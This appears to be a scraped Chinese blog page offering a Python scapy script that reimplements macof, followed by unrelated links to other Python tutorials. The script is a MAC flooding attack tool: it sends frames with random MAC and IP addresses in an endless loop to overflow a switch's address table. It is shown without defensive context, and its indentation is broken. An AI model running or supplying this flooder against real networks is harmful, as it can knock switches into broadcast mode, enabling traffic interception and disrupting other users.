Python实现macof

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Python实现macof相关的知识,希望对你有一定的参考价值。

import sys

from scapy.all import *

import time

iface="eth0"

if len(sys.argv)>=2:

    iface=sys.argv[1]

while(1):

eth = Ether(src=RandMAC("*:*:*:*:*:*"),dst=RandMAC("*:*:*:*:*:*"))

arp = IP(src=RandIP("*.*.*.*"),dst=RandIP("*.*.*.*"))

print eth.dst

packet = eth/arp/ICMP()

time.sleep(0.5)

sendp(packet,iface=iface,loop=0)


以上是关于Python实现macof的主要内容,如果未能解决你的问题,请参考以下文章

Python游戏开发,pygame模块,Python实现乒乓球小游戏

Python游戏开发,pygame模块,Python实现经典吃豆豆小游戏

实现pca降维-Python实现

Python游戏开发,pygame模块,Python实现俄罗斯方块小游戏

Python实现百度搜索并保存到本地示例,Python实现百度搜索

python实现定时发送系列